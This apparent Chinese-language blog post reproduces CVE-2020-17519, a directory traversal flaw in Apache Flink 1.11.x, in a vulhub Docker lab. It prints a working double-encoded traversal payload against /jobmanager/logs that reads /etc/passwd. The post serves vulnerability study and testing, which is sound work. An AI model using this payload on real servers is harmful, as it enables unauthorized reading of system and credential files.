Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现

Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现

  • 一、漏洞描述
  • 二、漏洞影响
  • 三、漏洞复现
    • 1、环境搭建
    • 2、漏洞复现
  • 四、漏洞POC
  • 五、参考链接

一、漏洞描述

ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。
Apache Flink 1.11.0 中引入的更改(以及在 1.11.1 和1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取JobManager本地文件系统上的任何文件。
访问仅限于 JobManager 进程可访问的文件。

二、漏洞影响

Apache Flink 1.11.0、Apache Flink 1.11.1、Apache Flink 1.11.2

三、漏洞复现

1、环境搭建

执行以下命令启动 Apache Flink JobManager 1.11.2:

cd vulhub/flink/CVE-2020-17519
docker-compose up -d

Apache Flink 启动后,访问 http://x.x.x.x:8081 查看主页:
Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现_第1张图片

2、漏洞复现

尝试访问/etc/passwd文件,构造Payload:/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
Apache Flink jobmanager/logs 目录穿越漏洞 CVE-2020-17519 漏洞复现_第2张图片

四、漏洞POC

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

五、参考链接

https://www.openwall.com/lists/oss-security/2021/01/05/2
https://vulhub.org/#/environments/flink/CVE-2020-17519/

你可能感兴趣的:(漏洞复现,Apache,Flink,jobmanager/logs,目录穿越漏洞,CVE-2020-17519,漏洞复现)